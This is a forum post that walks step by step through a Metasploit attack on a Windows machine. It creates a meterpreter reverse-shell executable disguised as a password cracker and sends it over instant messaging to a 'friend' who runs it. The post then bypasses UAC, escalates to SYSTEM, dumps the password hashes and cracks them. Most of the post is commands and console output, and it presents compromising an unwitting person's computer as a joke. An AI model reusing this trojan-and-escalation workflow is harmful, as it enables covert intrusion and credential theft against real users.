crossbower Posted February 1, 2014 Report Posted February 1, 2014 (edited) Binary PayloadsIt seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering, if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.Exemple with little joke :My friend need a good passwd cracker.I created for him a best passwd crackerHow to create a binary payload : Binary Payloads - Metasploit UnleashedWe generate a Windows meterpreter executable that will connect back to us on port 443msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exeNow the windows executable is created, we will use 'exploit/multi/handler' which is a stub that handles exploits launched outside of the framework.msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.19LHOST => 192.168.1.19msf exploit(handler) > set LPORT 443LPORT => 443msf exploit(handler) >exploitAnd the listener started Waiting for a victim:msf exploit(handler) > exploit[*] Started reverse handler on 192.168.1.19:443[*] Starting the payload handler...[*] Sending stage (474 bytes)[*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250)And I delivered for via IM for "my friend",..he executed the binary payload and the game started for hunting hashdump.Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.More info of privilege escalation here Privilege Escalation - Metasploit UnleashedBefor we take a hashdump we need running with SYSTEM priveleges.meterpreter > getuidServer username: redmon-PC\redmonThis session I put in the background session 1 and I used meterpreter module bypassuac.Reference : Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ?Source : Windows Escalate UAC Protection Bypassmsf > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set SESSION 1msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/revers_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(bypassuac) > set LHOST 192.168.1.19LHOST => 192.168.1.19msf exploit(bypassuac) > set LPORT 8989LPORT => 8989msf exploit(bypassuac) > exploit[*] Started reverse handler on 192.168.1.19:5555 [*] UAC is Enabled, checking level...[+] UAC is set to Default[+] BypassUAC can bypass this setting, continuing...[*] Checking admin status...[+] Part of Administrators group! Continuing...[*] Uploading the bypass UAC executable to the filesystem...[*] Meterpreter stager executable 73802 bytes long being uploaded..[*] Uploaded the agent to the filesystem....[*] Sending stage (769024 bytes) to 192.168.1.202[*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171)Now migrate one of the process wich running a SYSTEM privilegesRunning ps command we seen a process we need for SYSTEM privs1996 448 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEMMigrating a process SearchIndexer.exemeterpreter > migrate 1996[*] Migrating from 3456 to 1996...[*] Migration completed successfully.Now we running a 'getsystem' techniques to attempt to gain SYSTEM level privileges.meterpreter > getsystem...got system (via technique 1).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMNOW THE SYSTEM READY FOR I TAKE A HASHDUMPmeterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee :b963c57010f218edc2cc3c229b5e4d0f:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404 ee:f08f62a151d0b888dd5fe91187c3d968:::redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8 7bdb5fdc5e9cba88547376818d4:::The hashes I cracked with john passwd cracker.The metasploit have a jtr modules for crackingSorry for mistakes I was tired and still working workplaceVIDEO TUT:http://www.youtube.com/watch?v=j6dZIrO0890 Edited February 2, 2014 by crossbower Quote